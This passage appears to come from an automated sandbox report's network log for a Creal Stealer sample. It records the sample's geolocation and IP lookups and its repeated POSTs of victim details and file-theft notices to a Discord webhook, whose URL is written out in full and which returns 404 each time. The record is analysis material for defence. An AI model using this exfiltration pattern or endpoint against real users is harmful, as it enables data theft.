                                                                                                                                                                                                                                                                                                2024-09-27 16:19:04 UTC431OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 5a 69 70 73 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 5c 6e 5c 6e 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 43 72 65 61 6c 53 74 65 61 6c 65 72 22 2c 20 22 69 63 6f 6e 5f 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 41
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"title": "Creal Zips", "description": "\n\n", "color": 2895667, "footer": {"text": "Creal Stealer | https://t.me/CrealStealer", "icon_url": "https://raw.githubusercontent.com/A
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:04 UTC1339INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:19:04 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=36d953d87cec11efb2b57e7726d028ec; Expires=Wed, 26-Sep-2029 16:19:04 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 4
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453946
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x%2BLVaQmZS2Sc3Ef9Brfygf%2FLqkF6%2Fvon5MjZ65z4vlAicTKRzU6zDJ3HPkmqt0IG%2B3VVqG6xQ%2BjBu7AKHb8I3laRIWQ9LrPECDeecIKtvuWl3nE4B1mFOTcajhLQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=36d953d87cec11efb2b57e7726d028ecf197d44e174edb94b72f5026d3879ad6f2483b00dc1582840d93ff3c0e1a2a6c; Expires=Wed, 26-Sep-2029 16:19:04 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=eec4d8ba3fc34a38b5d32968d39e8cb613742df2-1727453944; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:04 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 5f 56 56 53 75 69 70 52 4f 6a 4e 34 41 54 63 51 5f 61 35 39 34 63 4c 42 53 4f 68 67 44 32 63 52 6e 34 2e 34 4a 64 55 52 52 35 41 2d 31 37 32 37 34 35 33 39 34 34 36 32 37 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 33 31 38 62 36 30 38 63 36 63 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=_VVSuipROjN4ATcQ_a594cLBSOhgD2cRn4.4JdURR5A-1727453944627-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd0318b608c6c-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:04 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                34192.168.2.849747159.89.102.2534434040C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:04 UTC139OUTGET /jsonp/8.46.123.33 HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Host: geolocation-db.com
                                                                                                                                                                                                                                                                                                User-Agent: Python-urllib/3.12
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:04 UTC206INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:19:04 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:04 UTC171INData Raw: 61 30 0d 0a 63 61 6c 6c 62 61 63 6b 28 7b 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 69 74 79 22 3a 6e 75 6c 6c 2c 22 70 6f 73 74 61 6c 22 3a 6e 75 6c 6c 2c 22 6c 61 74 69 74 75 64 65 22 3a 33 37 2e 37 35 31 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 39 37 2e 38 32 32 2c 22 49 50 76 34 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 73 74 61 74 65 22 3a 6e 75 6c 6c 7d 29 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: a0callback({"country_code":"US","country_name":"United States","city":null,"postal":null,"latitude":37.751,"longitude":-97.822,"IPv4":"8.46.123.33","state":null})0


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                35192.168.2.849749172.67.74.1524435340C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:05 UTC117OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Host: api.ipify.org
                                                                                                                                                                                                                                                                                                User-Agent: Python-urllib/3.12
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:05 UTC211INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:19:05 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                                                                Content-Length: 11
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                CF-RAY: 8c9cd0356db18c65-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:05 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                                                                                Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                36192.168.2.849750162.159.136.2324435340C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:05 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 431
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:05 UTC431OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 5a 69 70 73 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 5c 6e 5c 6e 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 43 72 65 61 6c 53 74 65 61 6c 65 72 22 2c 20 22 69 63 6f 6e 5f 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 41
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"title": "Creal Zips", "description": "\n\n", "color": 2895667, "footer": {"text": "Creal Stealer | https://t.me/CrealStealer", "icon_url": "https://raw.githubusercontent.com/A
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:05 UTC1335INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:19:05 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=3745d8fa7cec11efbb26cece28a49ce1; Expires=Wed, 26-Sep-2029 16:19:05 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 4
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453946
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q0GzNcUAQ5QXOYzMaOpozO4%2BjxJxGJGKIdU993iowjdeHkBreq2DYvaZvOwtEOXX%2FvNladSKdp9TQTQNSGxMqQuwKdKEI3nH1ZA6A4dBnu7TKVUcvR4TWgmWjsV%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=3745d8fa7cec11efbb26cece28a49ce13daca396a1a4a9e12bcb6eeac38f019c9784077103db5b2217588a1ef5ba7d7d; Expires=Wed, 26-Sep-2029 16:19:05 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=7baeebdb1a22e590ef420eaf6d22938737c07a8d-1727453945; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:05 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 6b 6e 72 59 7a 38 67 4e 58 49 55 6c 61 43 66 2e 71 5a 79 69 56 36 7a 77 38 41 4d 38 67 50 70 6a 62 32 39 37 30 54 50 73 31 6b 34 2d 31 37 32 37 34 35 33 39 34 35 33 33 37 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 33 35 62 66 33 34 30 63 38 32 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=knrYz8gNXIUlaCf.qZyiV6zw8AM8gPpjb2970TPs1k4-1727453945337-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd035bf340c82-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:05 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                37192.168.2.849751162.159.136.2324434040C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:05 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 506
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:05 UTC506OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 69 65 6c 64 73 22 3a 20 5b 7b 22 6e 61 6d 65 22 3a 20 22 49 6e 74 65 72 65 73 74 69 6e 67 20 66 69 6c 65 73 20 66 6f 75 6e 64 20 6f 6e 20 75 73 65 72 20 50 43 3a 22 2c 20 22 76 61 6c 75 65 22 3a 20 22 5c 6e 22 7d 5d 2c 20 22 61 75 74 68 6f 72 22 3a 20 7b 22 6e 61 6d 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 46 69 6c 65 20 53 74 65 61 6c 65 72 22 7d 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"color": 2895667, "fields": [{"name": "Interesting files found on user PC:", "value": "\n"}], "author": {"name": "Creal | File Stealer"}, "footer": {"text": "Creal Stealer | ht
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:05 UTC1335INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:19:05 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=374743ac7cec11efad60cece28a49ce1; Expires=Wed, 26-Sep-2029 16:19:05 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 3
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453947
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FAPX00iiQL2rdPnCQWLuW6iaItu3J7BL86ppxuslPnr%2B4oFrLgyLmEUsd6U97Dt7l1l4eDhFjjBxSy5Wf96AqxS1hGIjlQFmnMBumy%2BI43B2QF%2BS7g2YCxCsJjvz"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=374743ac7cec11efad60cece28a49ce116494306dec66456f12201b532cb9c28525ab117b160869c96c8222438cb39be; Expires=Wed, 26-Sep-2029 16:19:05 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=7baeebdb1a22e590ef420eaf6d22938737c07a8d-1727453945; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:05 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 51 6b 7a 35 4c 5a 70 76 37 4c 79 4c 55 64 36 44 55 63 66 70 47 6d 4f 6e 4c 4f 54 30 67 31 72 30 45 39 4e 74 4b 64 6e 71 55 64 45 2d 31 37 32 37 34 35 33 39 34 35 33 34 35 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 33 35 65 39 63 31 34 33 30 39 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=Qkz5LZpv7LyLUd6DUcfpGmOnLOT0g1r0E9NtKdnqUdE-1727453945345-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd035e9c14309-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:05 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                38192.168.2.849753162.159.136.2324435340C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:05 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 431
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:05 UTC431OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 5a 69 70 73 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 5c 6e 5c 6e 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 43 72 65 61 6c 53 74 65 61 6c 65 72 22 2c 20 22 69 63 6f 6e 5f 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 41
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"title": "Creal Zips", "description": "\n\n", "color": 2895667, "footer": {"text": "Creal Stealer | https://t.me/CrealStealer", "icon_url": "https://raw.githubusercontent.com/A
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:06 UTC1339INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:19:06 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=37aeaeb67cec11ef85eda6d8f199100f; Expires=Wed, 26-Sep-2029 16:19:06 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 3
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453947
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KM4BQVU0LGejaUHXf1y3BqoHku%2BjDuqeQVXkWTBIfnTsUWC5NH2ZIf354Pdni3mz7bfks51DO%2F%2BoY5Hl348PyPRudfcQ%2Be58hKtyTFrk80aXU2QuvQMhgKwcJm%2B7"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=37aeaeb67cec11ef85eda6d8f199100f6db23391f423498162d6ca09eef0d3fa3b8684ee6f6c835feaaad9d48724a5b9; Expires=Wed, 26-Sep-2029 16:19:06 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=775dfac769927facd0539e6a10014028daddaa4a-1727453946; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:06 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 45 39 78 4f 75 5f 33 52 73 62 75 53 70 58 43 78 49 32 44 71 72 58 78 68 75 36 58 2e 55 42 58 63 33 6e 34 59 54 74 63 53 53 69 41 2d 31 37 32 37 34 35 33 39 34 36 30 32 31 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 33 61 32 39 62 65 34 33 32 31 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=E9xOu_3RsbuSpXCxI2DqrXxhu6X.UBXc3n4YTtcSSiA-1727453946021-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd03a29be4321-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:06 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                39192.168.2.849754162.159.136.2324434040C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
